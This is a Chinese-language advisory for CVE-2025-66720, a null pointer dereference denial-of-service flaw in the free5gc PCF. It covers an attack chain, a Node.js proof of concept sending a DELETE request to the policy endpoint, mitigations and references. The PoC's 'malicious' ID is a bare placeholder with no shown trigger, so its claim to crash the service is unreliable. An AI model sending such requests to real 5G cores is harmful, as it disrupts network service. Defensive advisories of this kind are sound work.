CVE-2025-66720 free5gc PCF空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-66720

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

free5gc PCF

漏洞概述

CVE-2025-66720是free5gc项目中PCF（Policy Control Function）组件存在的一个高危安全漏洞。该漏洞发生在free5gc PCF 1.4.0版本的internal/sbi/processor/ampolicy.go文件中的HandleDeletePoliciesPolAssoId函数，由于对空指针的正确性检查不足，导致攻击者可以通过构造特定的请求触发空指针解引用，从而引发程序崩溃或拒绝服务攻击。作为5G核心网的关键组件，PCF负责策略控制功能，其服务中断将直接影响5G网络的正常运行。该漏洞无需认证即可利用，CVSS评分达到7.5分，属于高危级别漏洞，对5G网络基础设施的可用性构成严重威胁。

技术细节

该漏洞为典型的空指针解引用（Null Pointer Dereference）漏洞，位于free5gc PCF组件的ampolicy.go文件HandleDeletePoliciesPolAssoId函数中。当函数在处理删除策略关联ID（PolAssoId）的请求时，未对相关指针进行充分的空值检查。当攻击者发送特制的请求时，可能导致函数在访问未初始化或已被释放的内存地址时触发空指针解引用。由于该函数位于SBI（Service Based Interface）接口路径上，攻击者可通过网络直接发送恶意请求触发漏洞。成功利用此漏洞可导致PCF服务进程崩溃，造成策略控制功能不可用，影响与其相连的AMF、SMF等网元的正常运作。漏洞的利用无需任何认证凭证，且无需用户交互，攻击复杂度低。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标free5gc PCF服务的IP地址和监听端口（默认8080），确认服务版本低于1.4.1

STEP 2

步骤2

构造恶意请求：攻击者构造针对/npcf-policy-control/v1/policies/{polAssoId}端点的DELETE请求，使用特制的polAssoId参数触发空指针解引用

STEP 3

步骤3

发送攻击载荷：通过网络向PCF服务发送恶意请求，无需任何认证凭证即可触发漏洞

STEP 4

步骤4

触发漏洞：PCF的HandleDeletePoliciesPolAssoId函数在处理请求时，由于指针检查不当，导致空指针解引用

STEP 5

步骤5

服务崩溃：空指针解引用导致PCF进程崩溃或进入异常状态，造成策略控制功能不可用

STEP 6

步骤6

拒绝服务影响：PCF服务中断影响与其相连的AMF、SMF等网元，导致5G网络策略控制功能失效

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66720 PoC - Null Pointer Dereference in free5gc PCF
// Target: free5gc PCF < 1.4.1
// Attack Vector: Send crafted DELETE request to /npcf-policy-control/v1/policies/{polAssoId}

const http = require('http');

const targetHost = '10.0.0.1';  // PCF IP address
const targetPort = 8080;
const polAssoId = 'malicious_pol_asso_id';  // Triggers null pointer

const options = {
  hostname: targetHost,
  port: targetPort,
  path: `/npcf-policy-control/v1/policies/${polAssoId}`,
  method: 'DELETE',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer invalid_token',
    'X-Forwarded-For': '10.0.0.2'
  },
  timeout: 5000
};

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  console.log('PoC request sent. Check PCF service availability.');
});

req.on('error', (e) => {
  console.log('Error occurred - potential DoS condition:');
  console.log(e.message);
});

req.on('timeout', () => {
  req.destroy();
  console.log('Request timeout - service may be unresponsive');
});

req.end();

console.log('CVE-2025-66720 PoC - Sending malicious DELETE request...');

影响范围

free5gc PCF < 1.4.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在网络层配置ACL规则，限制只有受信任的网元（AMF、SMF等）才能访问PCF的SBI接口；2) 部署Web应用防火墙（WAF）或API网关，对异常请求进行过滤和阻断；3) 启用PCF服务的详细日志记录，监控是否存在异常的DELETE请求模式；4) 考虑在PCF前部署负载均衡器，实现故障转移，提高服务可用性。但最根本的解决方案仍是尽快升级到官方修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66720
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66720
3 Details https://www.cvedetails.com/cve/CVE-2025-66720/
4 VulDB https://vuldb.com/cve/CVE-2025-66720
5 Link https://github.com/free5gc/free5gc/issues/726
6 Link https://github.com/free5gc/pcf/pull/57